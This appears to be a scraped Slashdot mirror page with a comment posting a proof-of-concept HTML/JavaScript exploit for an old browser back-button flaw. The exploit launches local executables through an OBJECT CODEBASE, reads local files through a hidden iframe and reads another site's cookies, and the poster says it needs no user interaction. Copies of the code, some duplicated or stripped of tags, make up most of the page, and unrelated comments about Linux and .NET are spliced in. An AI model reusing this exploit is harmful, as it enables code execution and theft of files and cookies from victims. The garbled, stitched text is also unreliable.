<html> <h1>Press link and then the backbutton to trigger script.</h1> <a href="javascript:execFile('file:///c:/winnt/system 32/calc.exe')"> Run Minesweeper (c:/winnt/system32/calc.exe Win2000 pro)</a><br> <a href="javascript:execFile('file:///c:/winnt/system 32/calc.exe')"> Run Minesweeper (c:/windows/system32/calc.exe XP, ME etc...)</a><br> <a href="javascript:readFile('file:///c:/test.txt')"& gt; Read c:\test.txt (needs to be created)</a><br> <a href="javascript:readCookie('http://www.google.com / )"> Read Google cookie</a>
<script> // badUrl = "http://www.nonexistingdomain.se";// Use if not XP badUrl = "about:<html><body onload=javascript:history.back() ><form><input type=button onclick=javascript:history.back()> </form></body></html>"; function execFile(file){
alert (badUrl);
s = '<object classid=CLSID:11111111-1111-1111-1111-111111111111 ';
s+= 'CODEBASE='+file+'></OBJECT>';
backBug(badUrl,s); } function readFile(file){
s = '<iframe name=i src='+file+' style=display:none onload=';
s+= 'alert(i.document.body.innerText)></iframe&g t;';
backBug(badUrl,s); } function readCookie(url){
s = '<script>alert(document.cookie);close();< "+"/script>';
backBug(url,s); } function backBug(url,payload){
len = history.length;
page = document.location;
s = "javascript:if (history.length!="+len+") {";
s+= "open('javascript:document.write(\""+payload+"\")' )";
s+= ";history.back();} else '<script>location=\""+url
s+= "\";document.title=\""+page+"\";<"+"/script> ';";
location = s; } </script> </html>
This is a major one ,, user interaction not needed
on
Don't Hit That Back Button
·
· Score: 5, Informative
The flaw can be exploited *with out* user interaction,, use about: and use a body-onload javascript to execute the back button,, poc html page is attached. u know what this means:P.
----cut here---
Press link and then the backbutton to trigger script.
Run Minesweeper (c:/winnt/system32/calc.exe Win2000 pro)
Run Minesweeper (c:/windows/system32/calc.exe XP, ME etc...)
Read c:\test.txt (needs to be created)
Read Google cookie
// badUrl = "http://www.nonexistingdomain.se";// Use if not XP badUrl = "about: "; function execFile(file){
alert (badUrl);
s = '';
backBug(badUrl,s); } function readFile(file){
s = '';
backBug(badUrl,s); } function readCookie(url){
s = 'alert(document.cookie);close();';
backBug(url,s); } function backBug(url,payload){
len = history.length;
page = document.location;
s = "javascript:if (history.length!="+len+") {";
s+= "open('javascript:document.write(\""+payload+"\")' )";
s+= ";history.back();} else 'location=\""+url
s+= "\";document.title=\""+page+"\";';";
location = s; }
Two things,,
Why did you try linux? and Why did u ever try java and.Net ? both were significantly newer platforms during their time, and there did exist competitive technologies which were in existance for a long time. The point is to let the project mature and see what they can do , until then no one is asking you to jump.
Slashdot Mirror
sorry forgot the extrans correct page attached
m 32/calc.exe')">m 32/calc.exe')">& gt;m / )">
// Use if not XP
1 ';' )";
<html>
<h1>Press link and then the backbutton to trigger script.</h1>
<a href="javascript:execFile('file:///c:/winnt/syste
Run Minesweeper (c:/winnt/system32/calc.exe Win2000 pro)</a><br>
<a href="javascript:execFile('file:///c:/winnt/syste
Run Minesweeper (c:/windows/system32/calc.exe XP, ME etc...)</a><br>
<a href="javascript:readFile('file:///c:/test.txt')"
Read c:\test.txt (needs to be created)</a><br>
<a href="javascript:readCookie('http://www.google.co
Read Google cookie</a>
<script>
// badUrl = "http://www.nonexistingdomain.se";
badUrl = "about:<html><body onload=javascript:history.back() ><form><input type=button onclick=javascript:history.back()> </form></body></html>";
function execFile(file){
alert (badUrl);
s = '<object classid=CLSID:11111111-1111-1111-1111-11111111111
s+= 'CODEBASE='+file+'></OBJECT>';
backBug(badUrl,s);
}
function readFile(file){
s = '<iframe name=i src='+file+' style=display:none onload=';
s+= 'alert(i.document.body.innerText)></iframe&g t;';
backBug(badUrl,s);
}
function readCookie(url){
s = '<script>alert(document.cookie);close();< "+"/script>';
backBug(url,s);
}
function backBug(url,payload){
len = history.length;
page = document.location;
s = "javascript:if (history.length!="+len+") {";
s+= "open('javascript:document.write(\""+payload+"\")
s+= ";history.back();} else '<script>location=\""+url
s+= "\";document.title=\""+page+"\";<"+"/script> ';";
location = s;
}
</script>
</html>
The flaw can be exploited *with out* user interaction ,, use about: and use a body-onload javascript to execute the back button ,, poc html page is attached. u know what this means :P .
// Use if not XP
' )";
----cut here---
Press link and then the backbutton to trigger script.
Run Minesweeper (c:/winnt/system32/calc.exe Win2000 pro)
Run Minesweeper (c:/windows/system32/calc.exe XP, ME etc...)
Read c:\test.txt (needs to be created)
Read Google cookie
// badUrl = "http://www.nonexistingdomain.se";
badUrl = "about: ";
function execFile(file){
alert (badUrl);
s = '';
backBug(badUrl,s);
}
function readFile(file){
s = '';
backBug(badUrl,s);
}
function readCookie(url){
s = 'alert(document.cookie);close();';
backBug(url,s);
}
function backBug(url,payload){
len = history.length;
page = document.location;
s = "javascript:if (history.length!="+len+") {";
s+= "open('javascript:document.write(\""+payload+"\")
s+= ";history.back();} else 'location=\""+url
s+= "\";document.title=\""+page+"\";';";
location = s;
}
---cut here---
Two things ,, .Net ? both were significantly newer platforms during their time, and there did exist competitive technologies which were in existance for a long time. The point is to let the project mature and see what they can do , until then no one is asking you to jump.
Why did you try linux? and Why did u ever try java and